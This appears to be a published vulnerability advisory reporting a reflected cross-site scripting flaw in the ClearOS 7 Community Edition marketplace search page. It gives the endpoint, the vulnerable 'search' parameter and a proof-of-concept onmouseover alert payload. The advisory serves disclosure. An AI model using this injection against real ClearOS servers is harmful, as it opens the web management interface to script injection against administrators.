ClearOS 7 Community Edition suffers from a cross site scripting vulnerability.
32b6322d24448d2348621b162c00e749
##################################################################################################################################
# Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting
# Date: 06.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.clearos.com
# Software Link:
http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso
# Version: 7
##################################################################################################################################
Introduction
ClearOS is a small business server operating system with server,
networking, and gateway functions. It is designed primarily for homes,
small, medium, and distributed environments. It is managed from a web based
user interface, but can also be completely managed and tuned from the
command line. ClearOS is available in a free Community Edition, which
includes available open source updates and patches from its upstream
sources. ClearOS is also offered in a Home and Business Edition which
receives additional testing of updates and only uses tested code for
updates. Professional tech-support is also available. Currently ClearOS
offers around 100+ different features which can be installed through the
onboard ClearOS Marketplace.
#################################################################################
XSS details
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.104:81/app/marketplace/search
METHOD
Post
PARAMETER
search
PAYLOAD
' onmouseover=alert(1) '
#################################################################################